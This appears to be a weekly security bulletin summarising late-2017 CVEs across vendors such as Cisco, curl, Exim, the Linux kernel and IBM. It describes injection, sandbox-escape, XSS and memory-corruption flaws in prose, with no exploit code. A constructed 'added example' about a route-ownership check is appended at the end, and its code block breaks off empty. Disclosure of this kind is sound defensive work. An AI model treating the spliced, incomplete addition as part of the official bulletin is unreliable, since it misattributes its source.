A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to perform a command injection attack. The vulnerability is due to insufficient input validation of command arguments. An attacker could exploit this vulnerability by injecting crafted command arguments into a vulnerable CLI command and gain unauthorized access to the underlying operating system of the device. An exploit could allow the attacker to execute arbitrary commands at the user's privilege level. On products that support multiple virtual device contexts (VDCs), this vulnerability could allow an attacker to execute commands at the user's privilege level outside the user's environment. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Unified Computing System Manager. Cisco Bug IDs: CSCvf14923, CSCvf14926, CSCvg04095. | 2017-11-30 | not yet calculated | CVE-2017-12335
SECTRACK
CONFIRM
cisco -- nx_os
A vulnerability in the TCL scripting subsystem of Cisco NX-OS System Software could allow an authenticated, local attacker to escape the interactive TCL shell and gain unauthorized access to the underlying operating system of the device. The vulnerability exists due to insufficient input validation of user-supplied files passed to the interactive TCL shell of the affected device. An attacker could exploit this vulnerability to escape the scripting sandbox and execute arbitrary commands on the underlying operating system with the privileges of the authenticated user. To exploit this vulnerability, an attacker must have local access and be authenticated to the targeted device with administrative or tclsh execution privileges. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Unified Computing System Manager. Cisco Bug IDs: CSCve93750, CSCve93762, CSCve93763, CSCvg04127. | 2017-11-30 | not yet calculated | CVE-2017-12336
SECTRACK
CONFIRM
cisco -- nx_os
A vulnerability in Cisco NX-OS System Software running on Cisco MDS Multilayer Director Switches, Cisco Nexus 7000 Series Switches, and Cisco Nexus 7700 Series Switches could allow an authenticated, local attacker to access the Bash shell of an affected device's operating system, even if the Bash shell is disabled on the system. The vulnerability is due to insufficient sanitization of user-supplied parameters that are passed to certain functions of the Python scripting sandbox of the affected system. An attacker could exploit this vulnerability to escape the scripting sandbox and enter the Bash shell of the operating system with the privileges of the authenticated user for the affected system. To exploit this vulnerability, the attacker must have local access to the affected system and be authenticated to the affected system with administrative or Python execution privileges. Cisco Bug IDs: CSCvd86513. | 2017-11-30 | not yet calculated | CVE-2017-12340
CONFIRM
cisco -- nx_os
A vulnerability in the CLI of Cisco NX-OS System Software could allow an authenticated, local attacker to read the contents of arbitrary files. The vulnerability is due to insufficient input validation for a specific CLI command. An attacker could exploit this vulnerability by issuing a crafted command on the CLI. An exploit could allow the attacker unauthorized access to read arbitrary files on the underlying local file system. On products that support multiple virtual device contexts (VDCs), this vulnerability could allow an attacker to read files from any VDC. This vulnerability affects the following products running Cisco NX-OS System Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode, Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Unified Computing System Manager. Cisco Bug IDs: CSCve51707, CSCve93961, CSCve93964, CSCve93965, CSCve93968, CSCve93974, CSCve93976. | 2017-11-30 | not yet calculated | CVE-2017-12338
SECTRACK
CONFIRM
cisco -- prime_service_catalog
A SQL Injection vulnerability in the web framework of Cisco Prime Service Catalog could allow an unauthenticated, remote attacker to execute unauthorized Structured Query Language (SQL) queries. The vulnerability is due to a failure to validate user-supplied input that is used in SQL queries. An attacker could exploit this vulnerability by sending a crafted SQL statement to an affected system. Successful exploitation could allow the attacker to read entries in some database tables. Cisco Bug IDs: CSCvg30333. | 2017-11-30 | not yet calculated | CVE-2017-12364
BID
SECTRACK
CONFIRM
cisco -- secure_access_control_system
A vulnerability in the web-based interface of Cisco Secure Access Control System (ACS) could allow an unauthenticated, remote attacker to view sensitive information on an affected system. The vulnerability exists because the affected software does not sufficiently protect system software version information when the software responds to HTTP requests that are sent to the web-based interface of the software. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based interface of the affected software. A successful exploit could allow the attacker to view sensitive information about the software, which the attacker could use to conduct additional reconnaissance attacks. Cisco Bug IDs: CSCvf66155. | 2017-11-30 | not yet calculated | CVE-2017-12354
BID
SECTRACK
CONFIRM
cisco -- ucs_central_software
Multiple vulnerabilities in the web-based management interface of Cisco UCS Central Software could allow a remote attacker to conduct a cross-site scripting (XSS) attack against a user of the affected interface or hijack a valid session ID from a user of the affected interface. Cisco Bug IDs: CSCvf71978, CSCvf71986. | 2017-11-30 | not yet calculated | CVE-2017-12349
BID
SECTRACK
CONFIRM
cisco -- ucs_central_software
Multiple vulnerabilities in the web-based management interface of Cisco UCS Central Software could allow a remote attacker to conduct a cross-site scripting (XSS) attack against a user of the affected interface or hijack a valid session ID from a user of the affected interface. Cisco Bug IDs: CSCvf71978, CSCvf71986. | 2017-11-30 | not yet calculated | CVE-2017-12348
BID
SECTRACK
CONFIRM
cisco -- umbrella_virtual_appliance
The Cisco Umbrella Virtual Appliance Version 2.0.3 and prior contained an undocumented encrypted remote support tunnel (SSH) which auto-initiated from the customer's appliance to Cisco's SSH Hubs in the Umbrella datacenters. These tunnels were primarily leveraged for remote support and allowed authorized/authenticated personnel from the Cisco Umbrella team to access the appliance remotely and obtain full control without explicit customer approval. To address this vulnerability, the Umbrella Virtual Appliance version 2.1.0 now requires explicit customer approval before an SSH tunnel from the VA to the Cisco terminating server can be established. | 2017-12-01 | not yet calculated | CVE-2017-6679
BID
MISC
MISC
cisco -- unified_communications_manager
A vulnerability in the web-based management interface of Cisco Unified Communications Manager could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information. Cisco Bug IDs: CSCvf79346. | 2017-11-30 | not yet calculated | CVE-2017-12357
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
A "Cisco WebEx Network Recording Player Denial of Service Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCve11545, CSCve02843, CSCve11548. | 2017-11-30 | not yet calculated | CVE-2017-12367
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
A "Cisco WebEx Network Recording Player Remote Code Execution Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCve10584, CSCve10591, CSCve11503, CSCve10658, CSCve11507, CSCve10749, CSCve10744, CSCve11532, CSCve10762, CSCve10764, CSCve11538. | 2017-11-30 | not yet calculated | CVE-2017-12368
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
A "Cisco WebEx Network Recording Player Out-of-Bounds Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCve30208, CSCve30214, CSCve30268. | 2017-11-30 | not yet calculated | CVE-2017-12369
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
A "Cisco WebEx Network Recording Player Remote Code Execution Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCvf38060, CSCvg54836, CSCvf38077, CSCvg54843, CSCvf38084, CSCvg54850. | 2017-11-30 | not yet calculated | CVE-2017-12370
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
A "Cisco WebEx Network Recording Player Remote Code Execution Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCvf49650, CSCvg54853, CSCvg54856, CSCvf49697, CSCvg54861, CSCvf49707, CSCvg54867. | 2017-11-30 | not yet calculated | CVE-2017-12371
BID
SECTRACK
CONFIRM
cisco -- webex_network_recording_player
A "Cisco WebEx Network Recording Player Remote Code Execution Vulnerability" exists in Cisco WebEx Network Recording Player for Advanced Recording Format (ARF) and WebEx Recording Format (WRF) files. A remote attacker could exploit this by providing a user with a malicious ARF or WRF file via email or URL and convincing the user to launch the file. Exploitation of this could cause an affected player to crash and, in some cases, could allow arbitrary code execution on the system of a targeted user. Cisco Bug IDs: CSCvf57234, CSCvg54868, CSCvg54870. | 2017-11-30 | not yet calculated | CVE-2017-12372
BID
SECTRACK
CONFIRM
cs-cart -- cs-cart
The files function in the administration section in CS-Cart 4.6.2 and earlier allows attackers to execute arbitrary PHP code via vectors involving a custom page. | 2017-11-28 | not yet calculated | CVE-2017-15673
MISC
curl_project -- curl_and_libcurl
The FTP wildcard function in curl and libcurl before 7.57.0 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) or possibly have unspecified other impact via a string that ends with an '[' character. | 2017-11-29 | not yet calculated | CVE-2017-8817
SECTRACK
CONFIRM
DEBIAN
curl_project -- curl_and_libcurl
The NTLM authentication feature in curl and libcurl before 7.57.0 on 32-bit platforms allows attackers to cause a denial of service (integer overflow and resultant buffer overflow, and application crash) or possibly have unspecified other impact via vectors involving long user and password fields. | 2017-11-29 | not yet calculated | CVE-2017-8816
BID
SECTRACK
CONFIRM
DEBIAN
curl_project -- curl_and_libcurl
curl and libcurl before 7.57.0 on 32-bit platforms allow attackers to cause a denial of service (out-of-bounds access and application crash) or possibly have unspecified other impact because too little memory is allocated for interfacing to an SSL library. | 2017-11-29 | not yet calculated | CVE-2017-8818
BID
SECTRACK
CONFIRM
d-link -- dir-605l_model_b
An issue was discovered on D-Link DIR-605L Model B before FW2.11betaB06_hbrf devices, related to the code that handles the authentication values for HNAP. An attacker can cause a denial of service (device crash) or possibly have unspecified other impact by sending a sufficiently long string in the password field of the HTTP Basic Authentication section of the HTTP request. | 2017-11-30 | not yet calculated | CVE-2017-17065
CONFIRM
dahua_technology -- ip_camera_and_ptz
A customer of a Dahua IP camera or IP PTZ could submit relevant device information to receive a time-limited temporary password from a Dahua authorized dealer to reset the admin password. The algorithm used in this mechanism is potentially at risk of being compromised and subsequently utilized by an attacker. | 2017-11-28 | not yet calculated | CVE-2017-9315
CONFIRM
dahua_technology -- ipc-hdw4300s
A firmware upgrade authentication bypass vulnerability was found in Dahua IPC-HDW4300S and some IP products. The vulnerability was caused by an internal debug function. This particular function was used for problem analysis and performance tuning during the product development phase. It allowed the device to receive only specific data (one direction, no transmit) and therefore it was not involved in any instance of collecting user privacy data or allowing remote code execution. | 2017-11-27 | not yet calculated | CVE-2017-9316
CONFIRM
dell_emc -- scaleio
An issue was discovered in EMC ScaleIO 2.0.1.x. A vulnerability in message parsers (MDM, SDS, and LIA) could potentially allow an unauthenticated remote attacker to send specifically crafted packets to stop ScaleIO services and cause a denial of service situation. | 2017-11-28 | not yet calculated | CVE-2017-8019
CONFIRM
BID
dell_emc -- scaleio
An issue was discovered in EMC ScaleIO 2.0.1.x. A buffer overflow vulnerability in the SDBG service may potentially allow a remote unauthenticated attacker to execute arbitrary commands with root privileges on an affected server. | 2017-11-28 | not yet calculated | CVE-2017-8020
CONFIRM
BID
dell_emc -- scaleio
An issue was discovered in EMC ScaleIO 2.0.1.x. In a Linux environment, one of the support scripts saves the credentials of the ScaleIO MDM user who executed the script in clear text in temporary log files. The temporary files may potentially be read by an unprivileged user with access to the server where the script was executed to recover exposed credentials. | 2017-11-28 | not yet calculated | CVE-2017-8001
CONFIRM
BID
digium -- asterisk_open_source
An issue was discovered in chan_skinny.c in Asterisk Open Source 13.18.2 and older, 14.7.2 and older, and 15.1.2 and older, and Certified Asterisk 13.13-cert7 and older. If the chan_skinny (aka SCCP protocol) channel driver is flooded with certain requests, it can cause the asterisk process to use excessive amounts of virtual memory, eventually causing asterisk to stop processing requests of any kind. | 2017-12-01 | not yet calculated | CVE-2017-17090
CONFIRM
CONFIRM
east_nippon_telegraph_and_telephone_corporation -- pwr_q200_router
PWR-Q200 does not use random values for source ports of DNS query packets, which allows remote attackers to conduct DNS cache poisoning attacks. | 2017-12-01 | not yet calculated | CVE-2017-10874
CONFIRM
JVN
emc -- rsa_authentication_agent
EMC RSA Authentication Agent for Web: Apache Web Server version 8.0 and RSA Authentication Agent for Web: Apache Web Server version 8.0.1 prior to Build 618 have a security vulnerability that could potentially lead to authentication bypass. | 2017-11-29 | not yet calculated | CVE-2017-14377
CONFIRM
BID
SECTRACK
emc -- rsa_authentication_agent
EMC RSA Authentication Agent API 8.5 for C and RSA Authentication Agent SDK 8.6 for C allow attackers to bypass authentication, aka an "Error Handling Vulnerability." | 2017-11-29 | not yet calculated | CVE-2017-14378
CONFIRM
BID
SECTRACK
emc -- rsa_authentication_manager
EMC RSA Authentication Manager before 8.2 SP1 P6 has a cross-site scripting vulnerability that could potentially be exploited by malicious users to compromise the affected system. | 2017-11-28 | not yet calculated | CVE-2017-14379
CONFIRM
BID
SECTRACK
evince -- evince
Command injection in evince 3.24.8 via filename when printing to PDF. | 2017-11-27 | not yet calculated | CVE-2017-1000159
CONFIRM
exim -- exim
The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via vectors involving BDAT commands. | 2017-11-25 | not yet calculated | CVE-2017-16943
MISC
MISC
MISC
SECTRACK
MISC
MISC
MISC
MISC
MISC
DEBIAN
exim -- exim
The receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' character signifying the end of the content, related to the bdat_getc function. | 2017-11-25 | not yet calculated | CVE-2017-16944
MISC
MISC
MISC
SECTRACK
MISC
MISC
DEBIAN
EXPLOIT-DB
ffmpeg -- ffmpeg
The gmc_mmx function in libavcodec/x86/mpegvideodsp.c in FFmpeg 3.4 does not properly validate widths and heights, which allows remote attackers to cause a denial of service (integer signedness error and out-of-array read) via a crafted MPEG file. | 2017-11-30 | not yet calculated | CVE-2017-17081
MISC
MISC
MISC
foreman -- foreman
An attacker submitting facts to the Foreman server containing HTML can cause a stored XSS on certain pages: (1) Facts page, when clicking on the "chart" button and hovering over the chart; (2) Trends page, when checking the graph for a trend based on such a fact; (3) Statistics page, for facts that are aggregated on this page. | 2017-11-27 | not yet calculated | CVE-2017-15100
CONFIRM
CONFIRM
fortinet -- fortios
A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 5.6.0 to 5.6.2, 5.4.0 to 5.4.6, 5.2.0 to 5.2.12, 5.0 and below versions under SSL VPN web portal allows an authenticated user to inject arbitrary web script or HTML in the context of the victim's browser via the login redir parameter. A URL redirection attack may also be feasible by injecting an external URL via the affected parameter. | 2017-11-29 | not yet calculated | CVE-2017-14186
BID
SECTRACK
CONFIRM
fortinet -- fortiwebmanager
An improper access control vulnerability in Fortinet FortiWebManager 5.8.0 allows anyone that can access the admin webUI to successfully log in regardless of the provided password. | 2017-11-29 | not yet calculated | CVE-2017-14189
BID
SECTRACK
CONFIRM
gnu -- binutils
elf.c in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.29.1, does not validate sizes of core notes, which allows remote attackers to cause a denial of service (bfd_getl32 heap-based buffer over-read and application crash) via a crafted object file, related to elfcore_grok_netbsd_procinfo, elfcore_grok_openbsd_procinfo, and elfcore_grok_nto_status. | 2017-11-30 | not yet calculated | CVE-2017-17080
MISC
hangzhou_hikvision_digital_technology -- hikvision
HikVision Wi-Fi IP cameras, when used in a wired configuration, allow physically proximate attackers to trigger association with an arbitrary access point by leveraging a default SSID with no WiFi encryption or authentication. | 2017-12-01 | not yet calculated | CVE-2017-14953
MISC
FULLDISC
hitachi_vantara -- pentaho
In Hitachi Vantara Pentaho BA Platform through 8.0, a CSRF issue exists in the Business Analytics application. | 2017-11-27 | not yet calculated | CVE-2016-10701
MISC
MISC
MISC
ibm -- business_process_manager
IBM Business Process Manager 8.6.0.0 allows authenticated users to stop and resume the Event Manager by calling a REST API with incorrect authorization checks. | 2017-11-27 | not yet calculated | CVE-2017-1628
CONFIRM
BID
SECTRACK
MISC
ibm -- collaborative_lifecycle_management
An undisclosed vulnerability in CLM applications may result in some administrative deployment parameters being shown to an attacker. IBM X-Force ID: 124631. | 2017-11-27 | not yet calculated | CVE-2017-1251
CONFIRM
MISC
ibm -- doors_next_generation
IBM DOORS Next Generation (DNG/RRC) 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality, potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134064. | 2017-11-27 | not yet calculated | CVE-2017-1689
CONFIRM
BID
MISC
ibm -- doors_next_generation
IBM DOORS Next Generation (DNG/RRC) 4.0, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality, potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 131759. | 2017-11-27 | not yet calculated | CVE-2017-1560
CONFIRM
BID
MISC
ibm -- doors_next_generation
IBM DOORS Next Generation (DNG/RRC) 4.0, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality, potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 128460. | 2017-11-27 | not yet calculated | CVE-2017-1461
CONFIRM
BID
MISC
ibm -- doors_next_generation
IBM DOORS Next Generation (DNG/RRC) 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality, potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134063. | 2017-11-27 | not yet calculated | CVE-2017-1688
CONFIRM
BID
MISC
ibm -- doors_next_generation
IBM DOORS Next Generation (DNG/RRC) 4.0, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality, potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134000. | 2017-11-27 | not yet calculated | CVE-2017-1678
CONFIRM
BID
MISC
ibm -- doors_next_generation
IBM DOORS Next Generation (DNG/RRC) 4.0, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality, potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 132494. | 2017-11-27 | not yet calculated | CVE-2017-1593
CONFIRM
BID
MISC
ibm -- doors_next_generation
IBM DOORS Next Generation (DNG/RRC) 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality, potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 132927. | 2017-11-27 | not yet calculated | CVE-2017-1607
CONFIRM
BID
MISC
ibm -- doors_next_generation
IBM DOORS Next Generation (DNG/RRC) 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality, potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 133260. | 2017-11-27 | not yet calculated | CVE-2017-1650
CONFIRM
BID
MISC
ibm -- jazz_foundation
IBM Jazz Foundation products could allow an authenticated user to obtain sensitive information from stack traces. IBM X-Force ID: 131852. | 2017-11-27 | not yet calculated | CVE-2017-1570
CONFIRM
MISC
ibm -- jazz_products
IBM Jazz technology based products might divulge information that might be useful in helping attackers through error messages. IBM X-Force ID: 116868. | 2017-11-27 | not yet calculated | CVE-2016-6024
CONFIRM
MISC
ibm -- rhapsody_dm
IBM Rhapsody DM products could reveal sensitive information in HTTP 500 Internal Server Error responses. IBM X-Force ID: 124359. | 2017-11-27 | not yet calculated | CVE-2017-1240
CONFIRM
BID
MISC
ibm -- websphere_mq
IBM WebSphere MQ 8.0 and 9.0 could allow an authenticated user to cause a shared memory leak by MQ applications using dynamic queues, which can lead to lack of resources for other MQ applications. IBM X-Force ID: 125144. | 2017-11-27 | not yet calculated | CVE-2017-1283
CONFIRM
MISC
ibm -- websphere
IBM WebSphere Commerce Enterprise, Professional, Express, and Developer 7.0 and 8.0 could allow an authenticated attacker to obtain information such as user personal data. IBM X-Force ID: 128622. | 2017-11-27 | not yet calculated | CVE-2017-1484
CONFIRM
BID
MISC
inedo -- otter
Inedo Otter before 1.7.4 has directory traversal in filesystem-based rafts via vectors involving '/' characters or initial '.' characters, aka OT-181. | 2017-12-01 | not yet calculated | CVE-2017-15607
CONFIRM
CONFIRM
inedo -- otter
Inedo Otter through 1.7.4 mishandles a "</script>" substring in an initial DP payload, which allows remote attackers to cause a denial of service (crash) or possibly have unspecified other impact, as demonstrated by the Plan Editor. | 2017-12-01 | not yet calculated | CVE-2017-17086
CONFIRM
ismartalarm -- cubeone
Password file exposure in firmware in iSmartAlarm CubeOne version 2.2.4.8 and earlier allows attackers to execute arbitrary commands with administrative privileges by retrieving credentials from this file. | 2017-12-01 | not yet calculated | CVE-2017-13664
MISC
ismartalarm -- cubeone
Encryption key exposure in firmware in iSmartAlarm CubeOne version 2.2.4.8 and earlier allows attackers to decrypt log files via an exposed key. | 2017-12-01 | not yet calculated | CVE-2017-13663
MISC
javascript -- javascript
math.js before 3.17.0 had an arbitrary code execution in the JavaScript engine. Creating a typed function with JavaScript code in the name could result in arbitrary execution. | 2017-11-27 | not yet calculated | CVE-2017-1001002
CONFIRM
CONFIRM
javascript -- javascript
math.js before 3.17.0 had an issue where private properties such as a constructor could be replaced by using unicode characters when creating an object. | 2017-11-27 | not yet calculated | CVE-2017-1001003
CONFIRM
CONFIRM
javascript -- javascript
typed-function before 0.10.6 had an arbitrary code execution in the JavaScript engine. Creating a typed function with JavaScript code in the name could result in arbitrary execution. | 2017-11-27 | not yet calculated | CVE-2017-1001004
CONFIRM
CONFIRM
kmplayer -- kmplayer
KMPlayer 4.2.2.4 allows remote attackers to cause a denial of service via a crafted NSV file. | 2017-11-28 | not yet calculated | CVE-2017-16952
EXPLOIT-DB
lenovo -- xclarity_administrator
A vulnerability was identified in Lenovo XClarity Administrator (LXCA) before 1.4.0 where LXCA user account names may be exposed to unauthenticated users with access to the LXCA web user interface. No password information of the user accounts is exposed. | 2017-11-30 | not yet calculated | CVE-2017-3764
CONFIRM
libsndfile -- libsndfile
In libsndfile 1.0.25 (fixed in 1.0.26), a divide-by-zero error exists in the function wav_w64_read_fmt_chunk() in wav_w64.c, which may lead to DoS when playing a crafted audio file. | 2017-11-25 | not yet calculated | CVE-2017-16942
MISC
libtiff -- libtiff
tools/pal2rgb.c in pal2rgb in LibTIFF 4.0.9 allows remote attackers to cause a denial of service (TIFFSetupStrips heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted TIFF file. | 2017-12-02 | not yet calculated | CVE-2017-17095
MISC
MISC
libvirtd -- libvirtd
When libvirtd is configured by OSP director (tripleo-heat-templates) to use the TLS transport, it defaults to the same certificate authority as all non-libvirtd services. As no additional authentication is configured, this allows these services to connect to libvirtd (which is equivalent to root access). If a vulnerability exists in another service it could, combined with this flaw, be exploited to escalate privileges to gain control over compute nodes. | 2017-11-27 | not yet calculated | CVE-2017-15114
BID
CONFIRM
libxcursor -- libxcursor
 
libXcursor before 1.1.15 has various integer overflows that could lead to heap buffer overflows when processing malicious cursors, e.g., with programs like GIMP.2017-12-01not yet calculatedCVE-2017-16612
MLIST
UBUNTU
CONFIRM
CONFIRM
MLIST
libxfont_libxfont2 -- libxfont_libxfont2
 
In libXfont before 1.5.4 and libXfont2 before 2.0.3, a local attacker can open (but not read) files on the system as root, triggering tape rewinds, watchdogs, or similar mechanisms that can be triggered by opening files.2017-12-01not yet calculatedCVE-2017-16611
MLIST
UBUNTU
CONFIRM
MLIST
MLIST
linux -- linux_kernel
 
The Linux Kernel versions 2.6.38 through 4.14 have a problematic use of pmd_mkdirty() in the touch_pmd() function inside the THP implementation. touch_pmd() can be reached by get_user_pages(). In such case, the pmd will become dirty. This scenario breaks the new can_follow_write_pmd()'s logic - pmd can become dirty without going through a COW cycle. This bug is not as severe as the original "Dirty cow" because an ext4 file (or any other regular file) cannot be mapped using THP. Nevertheless, it does allow us to overwrite read-only huge pages. For example, the zero huge page and sealed shmem files can be overwritten (since their mapping can be populated using THP). Note that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) thp.2017-11-30not yet calculatedCVE-2017-1000405
MISC
EXPLOIT-DB
linux -- linux_kernel
 
The rngapi_reset function in crypto/rng.c in the Linux kernel before 4.2 allows attackers to cause a denial of service (NULL pointer dereference).2017-11-30not yet calculatedCVE-2017-15116
MISC
MISC
MISC
MISC
linux -- linux_kernel
 
The mm_init function in kernel/fork.c in the Linux kernel before 4.12.10 does not clear the ->exe_file member of a new process's mm_struct, allowing a local attacker to achieve a use-after-free or possibly have unspecified other impact by running a specially crafted program.2017-11-28not yet calculatedCVE-2017-17052
CONFIRM
BID
CONFIRM
CONFIRM
linux -- linux_kernel
 
The init_new_context function in arch/x86/include/asm/mmu_context.h in the Linux kernel before 4.12.10 does not correctly handle errors from LDT table allocation when forking a new process, allowing a local attacker to achieve a use-after-free or possibly have unspecified other impact by running a specially crafted program. This vulnerability only affected kernels built with CONFIG_MODIFY_LDT_SYSCALL=y.2017-11-28not yet calculatedCVE-2017-17053
CONFIRM
BID
CONFIRM
CONFIRM
linux -- linux_kernel
 
The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel before 4.13.11 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages.2017-11-24not yet calculatedCVE-2017-16939
MISC
MISC
MISC
BID
MISC
MISC
MISC
linux -- linux_kernel
 
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.2017-11-27not yet calculatedCVE-2017-16994
CONFIRM
CONFIRM
BID
CONFIRM
CONFIRM
EXPLOIT-DB
misp -- misp
 
The admin_edit function in app/Controller/UsersController.php in MISP 2.4.82 mishandles the enable_password field, which allows admins to discover a hashed password by reading the audit log.2017-11-25not yet calculatedCVE-2017-16946
CONFIRM
moore_thompson -- mt_cloud
 
SQL injection vulnerability in the A-Reserve and A-Reserve for MT cloud versions 3.8.6 and earlier allows an attacker to execute arbitrary SQL commands via unspecified vectors.2017-12-01not yet calculatedCVE-2017-10899
JVN
moore_thompson -- mt_cloud
 
SQL injection vulnerability in the A-Member and A-Member for MT cloud versions 3.8.6 and earlier allows an attacker to execute arbitrary SQL commands via unspecified vectors.2017-12-01not yet calculatedCVE-2017-10898
JVN
opendaylight_project -- karaf
 
OpenDaylight Karaf 0.6.1-Carbon fails to clear the cache after a password change, allowing the old password to be used until the Karaf cache is manually cleared (e.g. via restart).2017-11-30not yet calculatedCVE-2017-1000406
MLIST
CONFIRM
CONFIRM
pebble -- smartwatch
 
Pebble Smartwatch devices through 4.3 mishandle UUID storage, which allows attackers to read an arbitrary application's flash storage, and access an arbitrary application's JavaScript instance, by modifying a UUID value within the header of a crafted application binary.2017-11-28not yet calculatedCVE-2016-10702
MISC
pivotal -- cloud_foundry
 
In Pivotal Single Sign-On for PCF (1.3.x versions prior to 1.3.4 and 1.4.x versions prior to 1.4.3), certain pages allow code to be injected into the DOM environment through query parameters, leading to XSS attacks.2017-11-27not yet calculatedCVE-2017-8044
BID
CONFIRM
pivotal -- cloud_foundry
 
An issue was discovered in Cloud Foundry Foundation capi-release (all versions prior to 1.45.0), cf-release (all versions prior to v280), and cf-deployment (all versions prior to v1.0.0). The Cloud Controller does not prevent space developers from creating subdomains to an already existing route that belongs to a different user in a different org and space, aka an "Application Subdomain Takeover."2017-11-28not yet calculatedCVE-2017-14389
CONFIRM
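Added example (not part of this bulletin and not the Cloud Controller's code): a route-registration check of the kind the CVE-2017-14389 entry calls for. It assumes routes are identified by a host plus a domain and owned by an "org/space" string. The naive mode rejects only an exact duplicate of a foreign route, which is the gap the entry describes; the strict mode also rejects a route whose fully qualified name nests under a route owned by a different org/space, comparing DNS labels rather than string suffixes so that "myshop.apps.example.com" is not mistaken for a subdomain of "shop.apps.example.com". All routes and owners below are constructed.

```python
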